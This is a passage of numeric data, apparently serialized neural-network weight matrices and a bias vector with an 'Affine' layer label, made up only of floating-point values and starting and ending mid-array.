0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.297, 0.614, 0.01775, 0.09467, 0.2874, 0.0905, 0.653, 0.02303, -0.0618, 0.00454, -0.1768, 0.793, -0.049, -0.06415, -0.04373, 0.0527, 0.07526, 0.01772, -0.464, -0.8345, -0.2622, 0.006756, 0.3215, -0.127, 0.01286, 0.2362, 0.1669, 0.153, -0.1467, 0.10846, -0.03986, -0.2401, -0.1376, -0.3496, 
0.196, 0.359, -0.1697, -0.08185, 0.1736, -0.02675, -0.0784, 0.004242, -0.2815, 0.471, 0.06165, -0.004524, -0.391, 0.0679, -0.0629, 0.0645], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5576, -0.1733, 0.03925, 0.02176, -0.1084, 0.05255, -1.41, -0.001099, -0.02863, 0.0368, -0.03412, -0.004494, 0.06934, -0.007835, -0.005104, -0.04395, -0.05032, -0.052, -0.035, 0.1783, 0.01001, 0.02, -0.09546, -0.01543, 0.08575, -0.10504, -0.11395, -0.1461, 0.02348, 0.01695, 0.0983, 0.0010195, 0.002104, -3.32, -0.203, 0.1106, -0.1685, -0.06094, 0.0581, -0.01335, -0.002447, 0.1186, -1.704, -4.305, -0.0355, -0.10693, -0.1777, -0.00766, 0.013115, 0.02757], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02046, 0.02237, -0.02438, 0.01463, -0.04153, 0.0082, -0.00892, 0.0317, 0.00555, -0.00877, -0.05484, 0.02748, -0.02211, 0.00906, -0.01148, -0.04657, -0.04358, 0.01999, -0.0331, 0.04718, -0.0046, -0.02844, 0.01563, 0.02074, 0.01245, -0.0433, 0.01842, 0.01624, -0.02742, -0.0302, 0.01755, -0.009254, -0.01562, -0.02678, 0.01852, 0.03586, -0.00947, 0.0324, -0.0584, -0.02493, -0.0316, -0.01845, -0.02367, -0.006493, -0.0348, -0.02222, 0.01054, 0.00757, -0.0001469, -0.03622], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1061, 1.291, 1.769, 0.0431, -3.861, -0.1633, 0.133, -0.2372, -0.2974, -0.4707, -0.2227, 0.1359, 1.251, 0.4246, -0.2998, 0.362, -0.1473, -2.404, 1.108, -0.6943, 0.1583, 
-0.01468, 0.9404, 0.2302, -2.0, -1.172, 0.7393, -0.2642, 0.08875, -0.1309, -0.3992, 2.566, 0.1886, -0.611, 0.1715, 0.272, -0.2126, -4.35, -0.3054, -0.007504, -0.08453, 0.546, 1.023, 0.1746, -0.6963, -0.0698, 0.8296, -0.6104, 0.2927, -0.604], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02477, 0.01154, -0.0798, 0.1594, -4.32, -1.285, -0.426, -0.586, -0.0628, -1.271, 0.008484, -0.1602, 0.00717, 0.01293, -0.01443, -0.0005145, 0.04614, -0.02911, -0.01233, 0.06192, -0.2664, -0.0267, 0.01055, -0.452, 0.01549, -0.2389, -0.0814, 0.0802, -0.00908, 0.001167, 0.04932, -0.2832, -0.8496, -2.545, 0.02573, -0.02275, -0.005634, -0.1465, -0.12146, -2.396, 0.01799, 0.1969, -0.9683, -0.4558, 0.00459, -0.067, -2.473, -0.2659, -0.00906, -0.928], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1396, 1.065, 0.4902, -2.176, 3.127, -1.036, -1.368, -0.1556, -1.365, -0.05774, -1.463, 0.322, -0.3447, -0.533, 1.386, 0.9727, 0.131, 0.342, 0.438, 1.2, -1.576, 1.14, 0.3555, 0.2035, 0.2498, 0.1931, -0.07874, 0.08936, -1.139, 0.2954, 0.1892, -0.1472, -0.2124, -0.4282, 0.2333, -0.9106, -0.9707, -0.459, -1.756, -0.5347, 0.665, 2.322, -0.981, 1.997, -2.271, 0.0743, 0.1423, -3.297, -0.2969, 3.14], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.8257, -0.699, -0.3264, -1.771, 0.2776, 0.554, 0.8125, 0.000936, -0.0111, -0.0417, -0.0806, 0.655, -0.224, -0.2277, 0.3328, 0.1669, 0.1229, -0.1776, 
-2.783, -0.557, -1.396, 0.05713, 0.2004, 0.2059, 0.2935, 0.3271, -0.03363, -0.07916, -1.509, 0.139, 0.04022, -1.085, -0.1455, -0.3467, 0.1923, -0.352, -0.574, -0.0987, 0.0846, -0.1255, -0.1947, -0.1765, -0.359, 0.693, 0.1531, 0.08997, -0.4133, 0.2484, -0.334, 0.074], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2292, -0.06354, -0.2057, -0.03516, 0.0823, -0.01561, 0.702, -0.03574, -0.1345, -0.173, 0.0817, -0.00847, -0.004925, 0.04565, -0.01903, 0.162, 0.0377, 0.02199, -0.16, -0.3164, 0.003664, 0.07153, -0.08496, 0.2686, 0.1932, -0.4219, -0.0202, 0.1364, 0.00575, -0.0829, -0.041, -0.2081, 0.0552, -0.1287, 0.04544, 0.3064, -0.01033, -0.05908, 0.02017, 0.02075, 0.11316, 0.09906, 0.0932, -0.00798, -0.068, 0.067, -0.0552, -0.0787, -0.007275, -0.0662], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02213, -0.1654, 0.168, 0.0421, -1.214, 0.02002, -0.629, -0.1334, 0.01672, -0.272, 0.0376, -1.941, 0.1676, 0.2261, 0.0542, -0.03818, -0.8076, -0.04956, -0.5376, -0.03757, 0.01665, -6.547, 0.3562, 0.004597, -2.635, 0.03168, -0.042, -2.65, -0.02391, -0.0948, -3.57, 0.1656, -0.05103, 0.01481, 0.244, 0.83, -0.01406, 0.00241, -0.03574, 0.03326, -0.1097, -0.7524, 0.05908, -5.832, -0.9404, 0.0657, -0.2003, -0.01444, -0.719, -0.3525], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5723, 0.12, 0.347, -0.0191, -2.027, -0.2417, 0.6646, -0.2866, -0.2383, 0.4563, -0.2031, 0.003862, 
0.1732, 0.0784, -0.644, 0.656, -0.1506, 0.3271, -0.014244, 0.0678, 0.2429, -0.03262, -0.1078, 0.1422, -0.1359, -0.1006, 0.1545, 0.3123, 0.1826, 0.008156, 0.0248, -1.069, -0.0563, -0.07153, 0.0988, 0.634, 0.2583, -0.6665, 0.0846, 0.3535, 0.2993, 0.325, 0.12115, 0.5703, 0.3672, -0.158, 0.1439, -0.9175, -0.05045, 1.184], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.51, 0.5444, 0.015465, -0.01453, 0.1843, -0.08093, -3.352, -0.3835, 0.0871, 0.05145, -0.1786, 0.269, 0.637, -0.1575, -0.0783, 0.04172, -0.967, -0.08215, 0.3616, -0.28, 0.0782, 0.01888, 0.3643, -0.0844, 0.2189, 0.02675, 0.0634, 0.05734, -0.007374, -0.009155, 0.05746, 0.0947, -0.0318, -0.05396, 0.02124, -0.4614, 0.03111, -0.05804, -0.2041, -0.134, -0.1222, -0.9, -0.1069, 0.0303, 0.005623, -0.072, -0.06793, -0.02711, -0.039, -0.02156], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1486, -0.599, -0.7026, -0.4087, -0.9927, -0.03296, -2.582, -0.1823, 0.01836, -0.388, 0.06757, -1.35, 0.2754, 0.2505, -0.2927, 0.04895, -0.04736, -0.04285, 0.9946, -0.8086, -0.0652, 0.3486, 0.004623, -0.2202, 0.5854, -0.3447, 0.2183, -0.01567, -0.2817, -0.8643, -2.146, 0.4194, -0.0505, 0.061, 0.1951, 0.2583, 0.04565, -0.255, -0.6694, 0.08057, -0.3213, -0.03214, -0.11414, -0.1396, -0.1229, -0.02779, 0.00417, -0.04437, -0.089, -1.165], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.631, -0.804, 0.5547, 0.4465, 1.582, -2.17, 
-0.002598, 1.166, 0.746, -2.195, -0.2776, 0.3018, 0.8916, 0.1338, 0.471, 0.8516, -0.1787, -0.376, 0.1141, 0.00911, -0.1763, -0.081, -1.45, 0.3433, 0.8203, -0.7695, -0.313, -1.232, 0.0757, -0.743, -0.9517, -0.3918, -0.4207, -0.694, -0.75, 0.3696, -0.2426, -0.9707, 0.1426, -0.1437, -0.6465, -2.762, -0.3892, -3.01, -0.2073, -0.2764, -1.202, 0.335, -0.006256, -3.068], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -2.656, -0.11017, 4.184, 0.2502, -0.128, 0.1973, 0.4075, -3.084, -4.652, -0.5815, 0.1626, 0.587, -1.814, 0.7495, 0.001604, -0.9297, 1.611, 1.257, 2.285, -0.0398, 0.603, -1.18, 2.717, -3.959, -7.01, -0.1614, -3.77, 1.639, 0.4924, -0.0876, 0.7954, 2.475, -3.145, -3.824, -0.971, 0.378, 1.288, -4.01, 4.676, 0.327, -0.982, 3.084, -4.836, 5.28, -0.1758, -0.7544, -17.06, -0.421, -0.09436, 2.113], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.8457, -3.766, -2.963, -1.054, -1.779, 0.09174, -1.563, 0.3086, -0.8564, 0.4988, 0.1934, 0.1733, -2.012, 0.3203, -1.926, 0.415, 0.08936, -0.847, 0.607, 0.003368, -3.271, 0.4116, -0.962, -2.145, 0.5015, -1.242, 0.3616, -0.2152, -0.3877, -3.018, -7.555, -1.065, -1.22, 0.2617, 3.438, 1.025, 0.113, -0.3406, -0.7305, 0.011604, -0.626, 0.832, -1.565, -4.67, -0.559, -0.2266, -1.134, -0.4626, -1.119, 0.9062], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.007, -3.002, 2.414, -0.756, 1.959, 1.005, -0.1333, -2.207, -5.164, 0.7017, 
-0.7886, -0.3748, -4.113, 0.3801, -7.223, 0.011566, -0.1159, -1.306, 1.091, -1.232, -0.0281, 1.953, -0.4065, -1.619, -2.785, -2.393, -8.625, 1.492, 1.461, 0.1464, -1.346, 1.042, 0.299, -2.576, 2.49, -6.656, -0.3406, -1.214, -0.2057, 0.87, -2.342, 1.901, -0.5776, -1.298, -0.02687, 0.559, -1.236, 0.1609, 0.4592, -0.1675], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0495, 0.3804, 0.3115, -0.0403, 0.02666, -0.03198, 0.07043, 0.03345, 0.09235, 0.00758, -0.1399, 0.09454, 0.1534, -0.007385, -0.03726, 0.1995, -0.01718, -0.1278, 0.126, -0.1193, 0.0285, -0.1957, 0.2793, -0.01426, 0.00199, 0.2499, 0.0961, -0.01616, 0.00788, 0.0371, -0.361, -0.0525, 0.0973, -0.1815, -0.1403, 0.1699, 0.02742, -0.03824, 0.0928, 0.0234, 0.2805, -0.4749, 0.008514, -0.1748, -0.03732, 0.01152, 0.03674, 0.02138, -0.0788, 0.01924], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.007965, -1.738, 0.3022, 0.02736, -0.6685, 0.02704, 0.6206, 0.11316, -0.0451, 0.0761, -0.02774, -0.865, -0.05807, 0.014046, 0.0447, 0.1527, -0.01398, 0.02194, -0.1935, 0.3818, -0.01357, 0.07794, 0.3418, -3.92e-05, -0.3984, 0.1688, 0.2017, -0.05127, 0.001426, 0.06335, -0.206, -0.0441, -0.05096, -0.0487, 0.123, 0.161, -0.00801, -0.02887, 0.0714, 0.01729, -0.08514, -0.3164, -0.07446, -0.223, -0.01802, -0.0964, -1.158, 0.04443, 0.05316, -0.103], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.7104, 0.05896, 0.2004, 
-0.03006, 0.543, -0.192, 0.394, -0.1367, -0.08014, 0.288, -0.073, -0.005585, 0.2438, 0.05292, -0.3652, 0.3975, -0.4756, 0.1426, -0.01513, 0.2454, 0.1522, -0.07355, 0.1123, 0.02051, -0.072, -0.1335, 0.0518, 0.1731, 0.111, 0.01654, 0.01035, -0.4697, -0.0324, -0.01945, 0.10645, -0.354, 0.1437, -0.2382, 0.159, 0.069, 0.10864, 0.3518, -0.0642, 0.2688, 0.202, -0.0815, -0.003794, -0.4114, 0.01267, 0.5605], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.284, 0.2416, 0.02441, -0.02945, -0.454, 0.6123, 1.104, -0.09753, 0.07764, -0.014046, 0.05066, 1.109, 0.2693, 0.0704, -0.01642, 0.2256, -0.010635, 0.4287, 0.1372, -0.3057, -0.01985, 0.05893, -0.08795, 0.0662, 0.1874, 0.4976, -0.0167, -0.2336, 0.01277, 0.04758, -0.2817, -0.755, 0.03156, -0.4268, 0.0827, 1.457, 0.0695, -0.11725, 0.07947, -0.02132, 0.01253, -0.10785, -0.02391, -0.3152, -0.1719, 0.0487, -0.02745, 0.02934, -0.03253, -0.4146], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01146, 0.735, -0.05646, -0.1724, -0.4958, -0.01636, 0.672, -0.00163, -0.596, -0.04166, 0.0461, 1.102, 0.1028, -0.0658, 0.09045, -0.211, 0.1431, -0.2141, 0.297, -0.153, -0.005882, 0.3354, 0.02397, 0.0013685, 0.2485, -0.02065, -0.00655, -0.05887, 0.149, -0.4575, -0.349, 0.01489, 0.004498, 0.00244, 0.2712, -0.06232, -0.02129, 0.013725, 0.02344, -0.02019, -0.1438, -0.1063, -0.01944, -0.2886, 0.06183, -0.04633, -0.01216, -0.01569, -0.005486, 0.01933]]
[-0.430061, -0.0245742, -1.85737, -0.0138152, 0.419247, -0.213587, 0.16007, 0.741838, 0.00846945, -0.726034, -4.74206, 0.0694902, -0.33274, 0.458429, -1.03401, -0.436594, 0.0870681, -1.17479, 0.295038, 0.64818, 0.596977, -2.17556, -1.11059, -0.429719, 0.24184, 0.161132, 0.103251, 0.190621, -2.56281, 0.428494, 0.165919, -0.0413155, -3.21202, 0.0165723, -1.44951, -0.212717, 0.096362, -0.183611, -0.554534, 0.339886, 0.36664, 1.18725, -7.0066, 0.864816, -4.08665, 0.190657, 0.438984, -0.664789, -0.114347, 0.121706, -0.4302, -0.02457, -1.857, -0.01382, 0.4192, -0.2136, 0.16, 0.7417, 0.00847, -0.726, -4.742, 0.0695, -0.3328, 0.4585, -1.034, -0.4365, 0.0871, -1.175, 0.295, 0.648, 0.597, -2.176, -1.11, -0.4297, 0.2418, 0.1611, 0.1033, 0.1907, -2.562, 0.4285, 0.1659, -0.04132, -3.213, 0.01657, -1.449, -0.2128, 0.0964, -0.1836, -0.5547, 0.3398, 0.3667, 1.1875, -7.008, 0.8647, -4.086, 0.1907, 0.439, -0.6646, -0.1143, 0.1217]
Affine
[[-0.0010049, 0.0177588, 0.00644684, 0.0100598, 0.00215751, 0.0241695, 0.020716, 0.00325348, 0.0376957, 0.0537383, 0.00396667, 0.000295171, 0.00844118, 0.00430048, 5.53546e-05, 0.0270628, 0.00422983, -0.0169606, 0.00433998, 0.0567525, 0.0600247, 0.0347097, 0.00104634, 0.00925969, 0.0104904, -0.0627135, 0.0129801, 0.143107, 0.000155933, 0.00909701, 0.186967, 0.0109487, -0.0154135, 0.366418, -0.00464881, -0.0105615, 0.0346626, 0.0354153, -0.000777726, 0.0038574, 0.00419073, -0.0172908, 0.00628022, -0.0146312, 0.00526843, 0.0235743, 0.0181072, -0.00114841, 0.0116412, -0.00497452, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00160923, 0.0238133, 0.00746871, -0.0031306, -0.0028099, 0.022873, 0.0236429, 0.00820832, 0.0433519, 0.0518454, -0.000974907, -0.000245709, 0.00399484, -0.00809352, -0.00729084, 0.0195302, -0.00845971, -0.028078, 0.0022241, 0.0669689, 0.0556077, 0.0375405, 0.00812147, -0.0106021, 0.0140604, -0.0113678, 0.0248419, 0.174828, 0.0145279, 0.0100504, 0.201379, 0.0206927, -0.014034, 0.413943, -0.0112926, -0.00436394, 0.0329306, 0.0233757, 0.0294505, 0.0155092, -0.00207847, -0.0257482, 0.013277, -0.0134533, 0.00197653, 0.0245503, 0.0200014, -0.0515162, 0.011273, -0.00887692, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0317032, 0.0212332, -0.00498239, 0.0276194, 0.0203134, 0.0217319, 0.0120344, -0.0062876, 0.0411111, 0.0582644, 0.00941772, 0.0153711, 0.0289061, 0.0130497, 0.00292384, 0.0252006, -0.0102096, -0.012132, 0.0139771, 0.0693007, 0.0526067, 0.0374207, -0.00258324, -0.00697084, 0.00310848, -0.0135615, 0.0204092, 0.159073, 0.00164534, 
0.0190926, 0.19954, 0.0133324, -0.0111085, 0.400429, -0.00365827, -0.0175431, 0.0316598, 0.0306686, -0.00118986, -0.0100581, 0.00221781, -0.0167647, -0.000780408, -0.0245084, 0.0207162, 0.0152769, 0.0214738, 0.00284946, 0.0194173, -0.00955315, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00386038, 0.0159409, 0.0125385, 0.00446224, -0.0279642, 0.0242819, 0.00800875, 0.0242513, -0.00429988, 0.0597856, -0.0114641, -0.0191129, 0.00406634, -0.0123403, -0.0165, 0.0248731, 0.0229474, -0.0287024, -0.0110197, 0.0460935, 0.0586005, 0.0364215, 0.0228337, 0.0147448, 0.0150308, -0.0141495, 0.0287788, 0.134752, 0.0210016, -0.0144816, 0.146935, 0.00479544, -0.019016, 0.198699, -0.009207, 0.0175599, 0.0421516, 0.0391117, 0.0313064, 0.0197998, -0.0245558, -0.0348254, 0.0142149, 0.0162112, -0.0102774, 0.0269725, 0.0188189, -0.0582468, -0.0100225, -0.0099651, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.032974, -0.00321035, -0.00730703, 0.0142817, 0.0309295, 0.0267673, 0.0229176, -0.022414, 0.00461009, 0.0524488, 0.0178036, 0.0293894, 0.0278019, 0.024519, 0.0120456, 0.034738, 0.0226422, 0.00185986, 0.0231078, 0.0506335, 0.0519765, 0.035548, -0.0209633, 0.00519522, -0.0129484, -0.0184528, -0.0054493, 0.0964997, -0.0113055, 0.0243227, 0.134838, 0.00860237, -0.0168496, 0.204973, 0.0131377, -0.0245341, 0.0375603, 0.0336533, 0.00147645, -0.0103691, 0.0188854, -0.00469537, -0.00316553, -0.038399, 0.0155334, 0.02367, 0.0162628, -0.00340823, 0.0212921, -0.00807586, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
